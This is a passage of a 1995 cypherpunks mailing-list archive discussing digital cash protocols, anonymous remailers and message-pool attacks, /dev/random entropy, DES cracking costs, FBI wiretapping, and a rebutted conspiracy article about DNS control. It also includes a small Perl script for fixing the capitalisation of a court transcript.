Date: Fri, 3 Nov 1995 00:32:25 +0800
Subject: Info needed on observers
Message-ID: <v01530501acbea2598fe2@[134.184.16.171]>



                               ////
                              (. .)
___________________________o00-(_)-00o___________________________________

Hi,

I am currently preparing a paper on payment systems for the Internet
and related issues.  I recently found out that so-called observers could
be placed on smart cards (in order to prevent double spending, or even to
prevent people from cheating on taxes...).

To be honest that's about all I know about observers and I am very eager
to find out more.  I am, however, having a hard time finding interesting
references on this subject.

Hence, all suggestions to get me started would be extremely welcome.
Questions of particular interest are: possible functions (and limits),
how 'real' are they already?, what about privacy?, ...

Many thanks in advance.

leo

_________________________________________________________________________
Leo Van Hove

Centre for Financial Economics
Vrije Universiteit Brussel (Free University of Brussels)
Pleinlaan 2
B-1050 Brussels
Vox: +32 629.21.25
Fax: +32 2 629.22.82
e-mail: lvhove at vnet3.vub.ac.be
_________________________________________________________________________







From hfinney at shell.portal.com  Thu Nov  2 08:34:44 1995
From: hfinney at shell.portal.com (Hal)
Date: Fri, 3 Nov 1995 00:34:44 +0800
Subject: ecash remailer
In-Reply-To: <199511020239.SAA27491@ix.ix.netcom.com>
Message-ID: <199511021523.HAA19598@jobe.shell.portal.com>


It's very frustrating to have to speculate so much due to the lack of
information.  Imagine how we would react if Cybercash or Netscape had
gone forward with what they claimed were secure protocols but had
refused to publish them, referring simply to old papers on RSA and
DES.  Yet Digicash gets away with this.

Bill Stewart <stewarts at ix.netcom.com> writes:

>At 01:20 PM 11/1/95 -0500, Michael Froomkin <froomkin at law.miami.edu> wrote:
>>I thought a property of Chaumian DigiCash was that a coin *had* to go back
>>to the bank before it could be spent again.  

>No.  The basic Chaum Digicash method looks like this:
>1) Alice creates a number of a recognizable form (Chaum's 1985 CACM paper
>uses n1n2n3...n64n1n2n3....n64, i.e. a 64-bit number concatenated with itself).
>2) Alice blinds the number and sends it to the bank (along with some request
>for withdrawing money from her account or payment in other coin or whatever.)
>3) The bank signs the number and sends it back.
>4) Alice unblinds the coin; now it's good, recognizably signed, and untraceable.

We presume it works basically like this, but there could be elaborations.
In particular, I have heard (from people who claim to know) that the
payee is normally embedded into the coin at spending time.

>>Logically, I can see at least four possibilities:
>>1) payee data is encoded onto the coin at time of payment, making it 
>>impossible for Carol to bank the coin.  I see no evidence of this in the 
>>docs at the Digicash site, but I just rechecked quickly and may have 
>>missed it.

>The basic protocol doesn't say anything about what a valid coin looks like;
>you could use the example in Chaum's paper or a long string followed by
>a checksum or whatever.  You _could_ put the payee's name account number
>in the string as the 64-bit "random" number, or even put both payer and payee.
>The bank could insist on that sort of thing if they wanted.
>If I remember right, the version in the Digicash trial left you the choice
>of filling in a specific payee or using "@" for bearer-payable coins.

Doing this would require the payee to be known at withdrawal time, which
is not apparently how it works.  I would speculate that actually what
happens is that the "basic coin" as above is encrypted, along with the
payee identity, all under the public key of the bank.  This was the
identity could not be stripped out by the payee or by a thief who snooped
the transmission.

Hal





From nobody at replay.com  Thu Nov  2 09:29:39 1995
From: nobody at replay.com (Name Withheld by Request)
Date: Fri, 3 Nov 1995 01:29:39 +0800
Subject: alt.anonymous.messages considered harmful
Message-ID: <199511021625.RAA17800@utopia.hacktic.nl>


alt.anonymous.messages considered harmful.

The advantage of using an anonymous message pool over using a chained
reply block is, of course, the huge number of potential recipients.
However, there are a number of problems, including a serious attack.
Some of them could be avoided with a slightly different approach.



1. When reading news on a server not under her direct control, Alice
lets leak information (article selection, time used per article),
so that she loses the additional security of using a message pool.
She can avoid this by processing alt.anonymous.messages off line.


2. By sending messages of a certain size and number to a pseudonymous
address, an attacker can find out that the pseudonymous user
participates in the pool: The encrypted messages are public;
encryption does not affect size and number of messages.

This information is also available at the alias server. That is not a
problem as such. Anonymity is protected by the size of the pool.

In combination with 1., this attack can lead to disclosure of a
pseudonym.


3. Denial of service attack. If the attacker can delay or suppress
delivery of messages to a subset of the recipients, the pseudonym's
reaction to the message or lack thereof reveals which subset the user
belongs to. He can track down the pseudonym to Alice with O(log(n))
messages.

This is a practical attack, not restricted to a single point of failure
such as the local news server: Persons at well-connected Usenet sites
can send cancel (or superseding) messages with restricted distribution
by use of the Distribution: and Path: lines.

Those who do get the message, can not notice a cancel attack; those
who don't, would have to carefully search for suspicious Supersedes:
lines and monitor the control newsgroup. A denial of service attack by
manipulated Path: header cannot be detected by the victim.



Denial of service attacks could be made somewhat less feasible by
making the pool accessible as a mailing list and via http.
Some problems not related to security (such as restricted availability
and bogus cross-posted traffic in the newsgroup) could also be solved
by reproducing the encrypted posts to alt.anonymous.messages in a
mailing list.

Identification of encrypted messages as needed for 2. and helpful for
3. can be prevented by using a fixed-size message format and inserting
cover messages.

If these messages are numbered and signed by the alias server, users
can detect denial of service attacks (but not distinguish them from
network errors) and try to get the messages through another channel.

For perfect security, however, feedback from all participants would be
required during transmission of the message. This is hardly possible.
So, for highest security return addresses, an "everyone a remailer"
mix net might be the better solution.





From dreschs at mpd.tandem.com  Thu Nov  2 09:45:01 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Fri, 3 Nov 1995 01:45:01 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511020847.AAA10833@jobe.shell.portal.com>
Message-ID: <199511021624.KAA05751@galil.austnsc.tandem.com.>


Rich Graves <llurch at networking.stanford.edu> said:

RG> On Thu, 2 Nov 1995 anonymous-remailer at shell.portal.com wrote:

>> But control of Internet domain name registration means the ability to
>> remove troublesome-or outspoken-computer systems from the
>> network. Po- tentially, this control also confers the power to
>> insinuate "phantom" domains into the network-for surveillance
>> purposes, for example-or for real-time, automatic censorship.

RG> Anyone capable of sending this message should have known that this
RG> was complete BS.

	Is it?  This is the _one_ thing in the article (is that term
giving it too much legitimacy?) that I whought was barely true.  Whoever
controls the root level DNS servers effectively controls the Internet.
I postulated a couple of months ago about how the US Govt might attempt
to censor the rest of the world: "Remove lurid.porno.site.other-country
from your DNS system within 72 hours or we will remove references to
your DNS servers from the root level servers.".  (I also speculated that
if the US Govt tried doing this, that an 'underground' DNS system would
form almost immediately.)

>> Furthermore, anecdotal evidence gathered by this author suggests that
>> actual "truth control" is taking place on the 'net now. E-mail
>> messages with controversial contents-including the details of the
>> SAIC takover of domain names-have consistently disappeared as they
>> travel across the net- work.

RG> And now we have PROOF! For THIS VERY MESSAGE, sent to THIS VERY LIST
RG> only EIGHT HOURS AGO was MYSTERIOUSLY DISAPPEARED! Hide the women
RG> and children!

	At least, it was allegedly lost.  If I were wanting to hype it,
I'd just _claim_ that it was lost.

		Sten
-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3





From rajaram at morgan.com  Thu Nov  2 10:06:00 1995
From: rajaram at morgan.com (P. Rajaram)
Date: Fri, 3 Nov 1995 02:06:00 +0800
Subject: ecash remailer
In-Reply-To: <199511020239.SAA27491@ix.ix.netcom.com>
Message-ID: <9511021209.ZM7820@morgan.com>


On Nov 2,  7:23am, Hal wrote:
> Subject: Re: ecash remailer
> It's very frustrating to have to speculate so much due to the lack of
> information.  Imagine how we would react if Cybercash or Netscape had
> gone forward with what they claimed were secure protocols but had
> refused to publish them, referring simply to old papers on RSA and
> DES.  Yet Digicash gets away with this.

So, refuse to buy their money.
Demand open systems.

If you feel like being more terroristic, get Markoff to write an article
on how a cypherpunk expert feels that the Mark Twain Bankshares system
'may' be insecure.

-r





From hallam at w3.org  Thu Nov  2 10:10:11 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 3 Nov 1995 02:10:11 +0800
Subject: FBI seeks huge wiretapping system
In-Reply-To: <199511020955.BAA04564@you.got.net>
Message-ID: <9511021709.AA03831@zorch.w3.org>



On this topic...

We had lunch with the deputy director of the NSA yesterday. In between
agreeing to put backdoors in the Internet, help round up subversives and
build a DES cracker :-) the topic of telephone tapping came up.


One point that was quite clear, a lot of what happens in the federal 
government has more to do with the agency structure than common sense.
When the NSA are being asked to comment on an export license they
are being asked "is this thing dangerous", not "should it be exported".
But when the response comes back to commerce "its dangerous" you can 
hardly expect the person on the other end to put their neck out on the
line and risk allowing an export license.

Out another way this is a beuracracy where the objective is to avoid
the negative rather than gamble for a positive. Where risks are taken
they are calculated beuracratic risks.

What is needed is a federal task force to reevaluate the crypto 
export issue. This should look at whether the effect of the embargo
is positive or negative. Of course the result would be known in 
advance but would provide a shield to hide behind. Would be useful
if some other counterproductive policies were re-examined at the same
time, like the persecution of Phil Zimmerman.

On ITAR he did say that the policy met the desired objective. The 
particular objective concerned was not stated however. Probably if
they could tell us the objective we could provide a solution but then
again if they told us it would probably defeat the objective in itself.


On telephone tapping the statement was made that they do not allow 
unauthorized taps and that technology was making wildcat taps by
local officials harder. Which makes sense. If the taps are performed
digitally they should be easier to monitor at a management level.
It is a fair point that just because technology has changed the 
nature of the game it should not mean that wiretaps cease to be 
possible.

What is very odd however is the FBI request for $500 million. This is
a somewhat large quantity of money to say the least. The telephone
switches are programmable these days, it should be possible to 
provide tapping at substantially less cost. Mind you the Federal
government is not known for tight cost control. The NSA reconned that
a DES cracker would cost substantially more than $1 million because
the system costs would be much higher than the component costs.
"And it would only be able to operate on one keystream at once", also
note "DES is used more for authenticity than for confidentialty by
banks". One reading, the NSA can get the info they need at less cost than
breaking DES because the financial feeds are using DES to provide
CBC residues for MACs rather than encryption. Anyway the NSA price 
estimate was "two or more orders of magnitude more in cost". I dispute
that since we brought in the ZEUS trigger system at arround $40 million
five years ago and it is vastly more complex than a DES cracker, this
constitutes a system cost of about ten times the raw component cost.
there was considerably more component diversity and system copmplexity
than any cypher machine would need. The raw input bandwidth of 
6 Terabytes/sec would chew up DEs keyspace very quickly (ie it
is equaivalent to exhausting a 40bit keyspace in a second).

If the NSA want a cheap DES cracker they have my number. I'll take 5%
ot the difference between the actual cost and $100 million (their
estimate of cost) as my fee.


		Phill





From tomw at orac.engr.sgi.com  Thu Nov  2 11:10:50 1995
From: tomw at orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 3 Nov 1995 03:10:50 +0800
Subject: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <DHEtE6.FB6@sgi.sgi.com>
Message-ID: <199511021747.JAA08919@orac.engr.sgi.com>


In article <DHEtE6.FB6 at sgi.sgi.com>, Mark Murray <mark at grondar.za> writes:

>> ? "Gut feel" suggests to me that large ammounts of "predicted" input might
>> be worse than the normal sort of system noise you have been using.
>> 
>> But keep in mind that what we're doing is XOR'ing the input data into
>> the pool.  (Actually, it's a bit more complicated than that.  The input
>> is XOR'ed in with a CRC-like function, generated by taking an
>> irreducible polynomial in GF(2**128).  But for the purposes of this
>> argument, you can think of it as XOR.)  So since you don't know what the
>> input state of the pool is, you won't know what the output state of the
>> pool.

> I chatted with a colleague at work, and he helped bend my mind right.
> I had the mistaken notion that adding lots of data would "overflow"
> and "dilute" the entropy to an attackable state.

I think the problem is not merely flooding the device with non-random
input data.  If you coordinate sucking out entropy with feeding in
non-random data you can suck the real entropy in the system down to zero
while making the driver think it has plenty of randomness.  While it's
not clear to me how this would lead to an attack, it would be worrisome.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw at engr.sgi.com





From anon-remailer at utopia.hacktic.nl  Thu Nov  2 11:41:37 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Fri, 3 Nov 1995 03:41:37 +0800
Subject: New release of CFS...
In-Reply-To: <m0tAfXb-0002duC@horten>
Message-ID: <199511011915.UAA18695@utopia.hacktic.nl>


Mats Bergstrom (asgaard at sos.sll.se) wrote:
> Andreas Bogk wrote:
>
> > Please report any leakage of this software immediately to this list.
>
> Try ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/cfs.1.3.tar.gz

That's 1.3, not 1.3.1.  What are the changes in the new version?





From tcmay at got.net  Thu Nov  2 11:42:06 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 3 Nov 1995 03:42:06 +0800
Subject: US government department for crime enforcement!
Message-ID: <acbcf81e00021004a02a@[205.199.118.202]>


At 2:40 PM 11/1/95, anonymous-remailer at shell.portal.com wrote:
>It's come to my attention that the US government has a group
>called the 'Department of the Treasury Financial Crimes
>Enforcement Network' in Vienna, Virginia.
>
>I know that burocrats like to keep themselves busy, but even
>I didn't think they would go so far as to enforce crimes to
>keep the law enforcement people busy.
>
>What a curious way to spend the taxpayers money.

The Financial Crimes Enforcement Network, FinCEN, is well known to readers
of this list. If you grep for it in my Cyphernomicon FAQ, you should find
references in several places. I first learned of it in 1990, and have
followed it as best I can since. Not too much has been published about it.

It's an interagency working group, with participation by Treasury, State,
FBI, CIA, IRS, Justice, etc.

A good overview of it was in an early issue of "Wired," and is likely
available at the HotWired Web site.

FinCEN's Web page is:

http://www.ustreas.gov/treasury/bureaus/fincen/fincen.html


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From mark at unicorn.com  Thu Nov  2 12:15:39 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Fri, 3 Nov 1995 04:15:39 +0800
Subject: New Mixmaster Remailer
Message-ID: <Pine.3.89.9511021922.A15602-0100000@unicorn.com>



This is the official announcement for the Ecafe Mixmaster Remailer that
has been running on ecafe.org for testing purposes for the last few weeks.
The address to send to is mixmaster at remail.ecafe.org, message reordering
is enabled with a poolsize currently set to two (which may be increased
when we get more traffic), and the key is attached. The remailer is
physically located in the UK.

For more information, check out the Web page at http://www.ecafe.org/~remail/

	Mark

Here is the public key for Ecafe Remailer

=-=-=-=-=-=-=-=-=-=-=-=
ecafe-mix mixmaster at remail.ecafe.org fff0d827161069a26ca44dead777c9ec 2.0.1

-----Begin Mix Key-----
fff0d827161069a26ca44dead777c9ec
258
AATgcIZ9GIj6VEZ2UmDO9BGmGVY5tZHVQp+2rChG
0E+lcD8lrHlWGwc/ea9Ycj8z2HGdWZl5ptXqfabf
YenIyO7YRr7teAzAAFmkBuwgBGUcpJUvIOjWlXBo
OGnku0AQYqOBDZSfknT+dAP01N82qDN13E6dUhEW
/0hdDNVghmsy2wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----









From jya at pipeline.com  Thu Nov  2 12:31:53 1995
From: jya at pipeline.com (John Young)
Date: Fri, 3 Nov 1995 04:31:53 +0800
Subject: CBW_boo
Message-ID: <199511021832.NAA29795@pipe3.nyc.pipeline.com>


   11-2-95. W$Japer:


   "Chemical and Biological Warfare Unmasked."

      For the first time in more than 25 years, the U.S. may
      be waking up to the seriousness of CBW. This high-level
      awakening is long overdue and reflected in a sudden
      increase in CBW sensor development research and counter-
      proliferation programs. Still, these steps blithely
      disregards 25 years of revolutionary advances in the
      biological and chemical sciences and the potential
      products of the Russian program. There is no allowance
      for "nonmilitary" CBW applications. Yet the most
      troublesome developments in the Russian CBW program are
      agents designed for covert use against diplomats,
      politicians and business executives. Also absent is
      serious attention to terrorist motivations and options.


   CBW_boo  (9 kb)













From m5 at dev.tivoli.com  Thu Nov  2 12:32:49 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Fri, 3 Nov 1995 04:32:49 +0800
Subject: FBI seeks huge wiretapping system
In-Reply-To: <199511020955.BAA04564@you.got.net>
Message-ID: <9511021924.AA12407@alpha>



hallam at w3.org writes:
 > It is a fair point that just because technology has changed the 
 > nature of the game it should not mean that wiretaps cease to be 
 > possible.

I disagree that this is a "fair point".  That wiretaps are possible is
an accident of design.  Just because that slice of the salami appears
gone, I see no reason to concede that it can't be re-attached.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From sameer at c2.org  Thu Nov  2 12:40:13 1995
From: sameer at c2.org (sameer)
Date: Fri, 3 Nov 1995 04:40:13 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511021624.KAA05751@galil.austnsc.tandem.com.>
Message-ID: <199511021810.KAA14547@infinity.c2.org>


> 
> 	Is it?  This is the _one_ thing in the article (is that term
> giving it too much legitimacy?) that I whought was barely true.  Whoever
> controls the root level DNS servers effectively controls the Internet.
> I postulated a couple of months ago about how the US Govt might attempt
> to censor the rest of the world: "Remove lurid.porno.site.other-country
> from your DNS system within 72 hours or we will remove references to
> your DNS servers from the root level servers.".  (I also speculated that
> if the US Govt tried doing this, that an 'underground' DNS system would
> form almost immediately.)
> 

	The US govt. doesn't run the root nameservers, nor are all the
root nameservers within US jurisdiction.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer at c2.org










From futplex at pseudonym.com  Thu Nov  2 13:15:10 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 05:15:10 +0800
Subject: [FRED] Anonymity and Integrity
In-Reply-To: <9511021110.AA01070@all.net>
Message-ID: <199511021934.OAA22117@opine.cs.umass.edu>


Dr. Frederick B. Cohen writes:
> To clarify even further, I seem to recall a posting some months ago from
> an anonymous source declaring a new on-line for-sale forum called the
> Internet Security Newsletter (or some such thing).  The anonymity of the
> poster in the context of asking for money and the fact that one of the
> people who was claimed to be on the board of editors was not, in fact, a
> participant, led to the question of who the person was.  

The poster wasn't actually anonymous, but rather pseudonymous, in that case.
(The pseudonym was the name of the publication, as I recall.)

> It turned out
> that this person had a substantial history of putting forth falsehoods
> as well as other related things that might have been very helpful in
> evaluating the credence of his statements.  It turned out that the
> newsletter was, at least in some sense and without making value
> judgements, legitimate; but the anonymity of the person making the posts
> made it harder to assure the integrity of the statements made, which
> exacerbated the assurance issue. 

It seems to me that the integrity of the statements was rather easily verified
based on the merits of the statements themselves. In particular, one or two
participants in the forum denied the claims made that they were members of
the editorial board.

Granted, some people would have been more inclined to look askance at the
messages if they had known the author's True Name. But as the saying goes,
"past performance is not a guarantee of future results". You can choose to
doubt or believe a message because of the author's past reputation. But
reputation is not a reliable predictor of the integrity of future assertions.
It's a nice psychological crutch, but reliance on a "rational expectation" is
a long way from anything I would call "assurance" or "verification". It
doesn't prove anything. The only acceptable method of assurance I can see is
careful analysis of the propositions posited, and empirical verification of
the facts presented. Leaning on past reputation is accepting an odd form of
Proof by Authority.

As it happened I had never heard of the True Name of the sender, so the
knowledge wasn't useful to me.

> I understand that over time, reputations can be built up for pseudonyms
> (which are not necessarily anonyms) but then, with a pseudonym we might
> reasonably ask what the motive is for hiding the real identity.  
[possible motives...]
> Without knowing the motive, how can we assess the statements? 

By asking yourself if they seem to make sense, checking them against known
facts and beliefs, etc. The same methods, IMHO, that are mainly appropriate
to assess anyone's statements.

> In fact, how can we know that the original pseudonym still
> applies? Someone could kill you and take over your pseudonym, and even
> though we might hear of your death, the pseudonym might continue based
> on your reputation but with another actual source.

Of course, the is-a-person problem has been discussed at great length. 
Digital signatures are as effective for pseudonyms as for anyone else.
The messages we've seen "from Alice de `nonymous" might all have come from
different senders. They exhibit a common tone and style, but that doesn't
assure us of anything. In a sense that makes them more inviting,
since there's always the chance that a third party is attempting a clever
parody or a sly bit of character assassination.

[...]
> It's an interesting concept that each statement should/could be taken on
> its own and evaluated independently of the rest of a person's life
> context, but in my experience, that has serious problems.

In my experience, that's about all I can usually do in network communication.
In principle I _could_ devote scads of time to background investigations of
my correspondents, for all except strongly anonymous and strongly 
pseudonymous parties, but I don't find that approach realistic.

-Futplex <futplex at pseudonym.com>





From llurch at networking.stanford.edu  Thu Nov  2 13:19:44 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Fri, 3 Nov 1995 05:19:44 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511020847.AAA10833@jobe.shell.portal.com>
Message-ID: <Pine.ULT.3.91.951102013958.18049A-100000@Networking.Stanford.EDU>


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 2 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> NOTE: More than 8 hours have passed since I sent this text in plaintext
> directly to Cypherpunks without its being posted, so in this attempt I am
> sending it encrypted through ALUMNI remailer. - Gary Jeffers
> gjeffers at socketis.net

Shit happens.

>                     INFO BLACKOUT

BWAHAHAHA!

>  From THE SPOTLIGHT newspaper's TECHNOLOGY & LIBERTY column by Clark
> Matthews - Nov. 06, 1995 issue.

The Spotlight's official classification in the UC and Stanford library
databases is "Serials -- Anti-Semitic." I don't mean to offend anyone too
much, but the Spotlight is generally regarded to be rather lunatic-fringe.
Though the same is probably said of anyone on the cypherpunks list, hmm... 

>    This ominous news came in the first of a series of articles by investi-
> gative journalist Steven Pizzo in WEB REVIEW, an online magazine of cyber-
> culture and politics (http://gnn.com/wr/) published by Songline Studios of

Spotlight tends to be rather vague in its sources for a reason. I found
the article to which this apparently refers at
http://gnn.com/gnn/wr/sept29/news/natl/index.html. It is rather less
lurid, but might still be of moderate concern. See the October 13
followup. 

I'm copying this to Steve Pizzo. I'm sure he'll get a real kick out of
being cited in The Spotlight, whose politics are a little different than 
his.

>    Through a complex chain of licensing arrangements and corporate acqui-
> sitions detailed in Pizzo's article, this crucial control over Internet
> domain names has passed from the non-profit National Science Foundation to
> Network Solutions, Inc. (NSI) of Herndon, Virginia. Last May, amid growing
> public disbelief of Establishment media reports about the Oklahoma City
> bombing provocation, NSI was purchased by Scientific Applications Interna-
> tional Corporation (SAIC) of San Diego.

This is semantically and logically equivalent to:

Last May, amid growing public disbelief of Establishment media reports 
about the Oklahoma City bombing provocation [provocation?], Fred Rogers 
changed his shoes.

Obviously, Mr. Rogers is part of the conspiracy.

>    SAIC is a $2 billion defense and FBI contractor with a board of direc-
> tors that reads like a Who's Who of the intelligence community. Board
> members include Admiral Bobby Ray Inman, the former director of the Na-
> tional Security Agency (NSA) and deputy director of the CIA; Melvin Laird,
> defense secretary under Richard Nixon; Donald Hicks, former head of re-
> search & development for the Pentagon; Donald Kerr, former head of the Los
> Alamos National Laboratory; and Gen. Maxwell Thurman (ret.), the commander
> of the U.S. invasion of Panama.

I know that at least part of this is true, at least in part.

SAIC also designed the hull of the Stars & Stripes yacht that won the 
America's Cup. Obviously Dennis Conner is part of a conspiracy that 
involves the Bavarian Illuminati, the Pope (who visited San Diego once), 
and New Zealand. Isn't it suspicious that the last America's Cup was 
contested and finally decided by the New York Supreme Court, the seat of 
the World Jewish Conspiracy?

Disclaimer: I was born in the San Diego area, and I know people who 
worked at SAIC, so I'm probably part of the conspiracy too.

>    The Internet is a marvel of computer software technology. It was de-
> signed to survive a nuclear attack on the United States-like the Post
> Office, it's literally smart enough to find a way to get the mail through,
> even if most of the network is missing.

I believe this is the first time I have seen the Post Office favorably 
cited.

>    But control of Internet domain name registration means the ability to
> remove troublesome-or outspoken-computer systems from the network. Po-
> tentially, this control also confers the power to insinuate "phantom"
> domains into the network-for surveillance purposes, for example-or for
> real-time, automatic censorship.

Anyone capable of sending this message should have known that this was 
complete BS.

>    Furthermore, anecdotal evidence gathered by this author suggests that
> actual "truth control" is taking place on the 'net now. E-mail messages
> with controversial contents-including the details of the SAIC takover of
> domain names-have consistently disappeared as they travel across the net-
> work.

And now we have PROOF! For THIS VERY MESSAGE, sent to THIS VERY LIST only
EIGHT HOURS AGO was MYSTERIOUSLY DISAPPEARED! Hide the women and children!

> News items concerning the Vincent Foster "suicide" investigation
> and allegations of NSA bank spying through compromised Inslaw software are
> being quickly and automatically canceled. And the cancellations are not by
> by their authors.

I know that several people who have been spamming the net with Foster 
garbage have been UDP'd. Read back issues of news.admin.net-abuse.misc.

> CRACKDOWN
> 
>    With domain names under the control of secret government insiders, it
> is even theoretically possible that large parts of the Internet could be
> SHUT DOWN AND SILENCED at critical times. This could be accomplished by
> suddenly altering domain name registrations or interposing compromised
> "domains" at crucial points.
> 
>    These compromised systems could serve as "black holes" at critical
> times, stopping e-mail and important news from reaching the world-or the
> rest of the country.
> 
>    Exercises in "turning the Internet off" have already taken place in
> Taiwan and Hong Kong. In Taiwan, the 'net was successfully shut down.
> All network traffic-including news, opinions and e-mail sent by computer
> users-was successfully "bottled up" on the island and prevented from
> reaching the world.
> 
>    In Hong Kong, the Internet wasn't quite strangled, but the British
> authorities who control that colony managed to throttle free electronic
> speech with the rest of the world until everything was bottlenecked into
> a few little-known satellite links.

Hmm, few specifics here. I wonder if they would care to elaborate. Nah.

It is, of course, true that countries including Singapore, China, 
Vietnam, and Cuba control net access rather tightly, and there have been 
reprisals against online dissidents.

>    These are alarming precedents and sure signs that powerful, shadowy
> forces are preparing to chop at the very roots of America's new Liberty
> Tree. The secretive people on the board of directors of SAIC are intell-
> igence professsionals skilled at manufacturing events-and then manufact-
> uring public opinion and consent by controlling the truth. Will Internet
> disinformation, censorship or "shutdowns" signal the next American crisis?

Only the Shadow knows.

- -rich
 llurch at networking.stanford.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJiap43DXUbM57SdAQHjBQP7BaaL0fgVCIpI5HDrTJ4TjtJgyjRWPWYU
vr2PuFBEGNZffzijaf9MTtwgjsYvy8/cMBuUiaBVIyVQloI1wfQMlHX1tVfnI6JM
hyT9zUJ4qovwsLCu+yX8JV1Ug2GtgyrW6AJJic+oFNohBJs8nQKxizwhVMa9AFrf
eAtmHLE+wsE=
=Qyen
-----END PGP SIGNATURE-----





From jim at acm.org  Thu Nov  2 13:22:52 1995
From: jim at acm.org (Jim Gillogly)
Date: Fri, 3 Nov 1995 05:22:52 +0800
Subject: Transcript of Bernstein hearing is now available
In-Reply-To: <9511020308.AA25206@toad.com>
Message-ID: <199511021951.LAA03152@mycroft.rand.org>



> John Gilmore <gnu at toad.com> writes:
> We received the transcript of October 20's oral hearing from the court
> stenographer.  It's up on the EFF Web site at:

> http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/951020_hearing.transcript

I find it hard to read things in all upper case.  Here's a slowish 95%
hack to make it more legible.  I imagine there's a 5-line way to do it
twenty times faster for 99% success, but what the heck...

	Jim Gillogly
	Highday, 12 Blotmath S.R. 1995, 19:47

-----------------------------------------------------------------------
#!/usr/bin/perl
# delegal: quick-n-dirty case conversion for Bernstein transcript
# 2 Nov 95, Gillogly

@propers =
( "daniel", "dan", "marilyn", "hall", "patel", "california", "bernstein",
  "united", "department", "state", "cohn", "coppolino", "national",
  "security", "agency", "steefel", "levitt", "weiss", "court", "i",
  "mc", "glashan", "sarrall", "lee", "tien", "ed", "ross", "susan", "arnold",
  "justice", "anthony", "mandel", "bazarov", "appeals", "helme", "webster",
  "states", "dorfmont", "constitution", "constitutional", "doe", "schechter",
  "snuffle", "june", "lowell", "cj", "edler", "olc", "mr", "ninth",
  "circuit", "judge", "ritchie", "english", "dr", "freedman", "o", "brien",
  "pentagon", "cubby", "compuserve", "golden", "gate", "san", "francisco",

);

$INDENT_UPALL = 13;     # If indented deeper than this, upcase each word
$INDENT_UPCOLON = 6;    # If indented with a colon and these spaces, upcase
$INDENT_PARA = 10;      # If indented this deep, upcase first word
$INDENT_SENT = 2;       # Pick up sentence starts

while ($proper = pop(@propers))
{
	($first, $rest) = ($proper =~ /^(.)(.*)$/);
	$first =~ tr/a-z/A-Z/;
	$caps{$proper} = $first . $rest;
}


while (<>)
{
	tr/A-Z/a-z/;            # Downcase everything
	s/u\.s\./U.S./g;        # special case
	s/d\.c\./D.C./g;        # special case
	s/([^a-z])nsa([^a-z])/$1NSA$2/g;  # Another one
	s/([^a-z])itar([^a-z])/$1ITAR$2/g;  # Another one

	# Upcase known proper names
	while (($proper, $cap) = each(%caps))
	{
		($first, $rest) = ($proper =~ /^(.)(.*)$/);
		s/([^a-z])$proper([^a-z])/$1$cap$2/g;
	}
	# If it's indented deeply, upcase each word
	if (/ {$INDENT_UPALL}/ || /: {$INDENT_UPCOLON}/)
	{
		while (($low) = /[^a-zA-Z]([a-z])/)
		{
			$low =~ tr/a-z/A-Z/;
			s/([^a-zA-Z])[a-z]/$1$low/;
		}
	}
	# Upcase middle initials
	while (($init) = / ([a-z])\./)
	{
		$init =~ tr/a-z/A-Z/;
		s/ [a-z]\./ $init\./;
	}
	# Upcase paragraphs
	if (($init) = / {$INDENT_PARA}([a-z])/)
	{
		$init =~ tr/a-z/A-Z/;
		s/( {$INDENT_PARA})[a-z]/$1$init/;
	}
	# Sentences
	($num, $_) = /^([ \d]*)([^ \d].*)$/; # Simplify
	while (($init) = /[^ ] {$INDENT_SENT}([a-z])/)
	{
		$init =~ tr/a-z/A-Z/;
		s/( {$INDENT_SENT})[a-z]/$1$init/;
	}
	$_ = $num . $_ . "\n";


	print $_;
}
-----------------------------------------------------------------------





From fc at all.net  Thu Nov  2 14:19:20 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Fri, 3 Nov 1995 06:19:20 +0800
Subject: Surviving DNS disruption
